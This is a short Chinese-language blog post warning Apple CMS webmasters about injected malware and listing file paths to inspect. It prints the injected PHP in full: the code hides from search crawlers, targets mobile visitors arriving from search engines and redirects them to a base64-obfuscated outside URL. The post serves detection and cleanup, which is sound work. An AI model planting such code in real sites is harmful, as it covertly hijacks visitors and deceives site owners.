影视行业用苹果CMS做站的人比较多,不少人在不愿意接广告情况下被强制挂马。
这种木马最常见在什么目录呢?建议每个站长都排查一下下面路径文件,没流量就不用查了
搜索引擎跳转广告就查
thinkphp/start.php
下面是木马重定向代码,根据条件随机触发跳转
$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {
if(strpos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad')) {
$laiyuan=@strtolower($_SERVER['HTTP_REFERER']);
if (strpos($laiyuan, 'baidu') || stripos($laiyuan, '360')|| stripos($laiyuan, 'google')|| stripos($laiyuan, 'cn')|| stripos($laiyuan, 'com') ||stripos($laiyuan, 'sogou') || stripos($laiyuan, 'so')) {
$new_url=base64_decode('aHR0cHM6Ly9oZXhpZXlzLmNvbS9nLnBocA==');
header("Location:$new_url");
exit;
}
}
}其他常见挂马文件路径
application/extra/
static/js/player.js
static/js/jquery.js
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
![APlayer播放器一个好看的超仿Blibili弹幕播放器(知新网ATOM原创)[非源代码是已经编译好的二进制程序]-知新网](https://vlog.wangyuanworld.cn/wp-content/uploads/2023/05/3704ce6f50d63c3892c7825dce47ddcf_shadow.webp)
![子比主题更改首页样式幻灯片大图全宽度[子比教程]-知新网](https://vlog.wangyuanworld.cn/wp-content/uploads/2023/12/image-47.webp)
暂无评论内容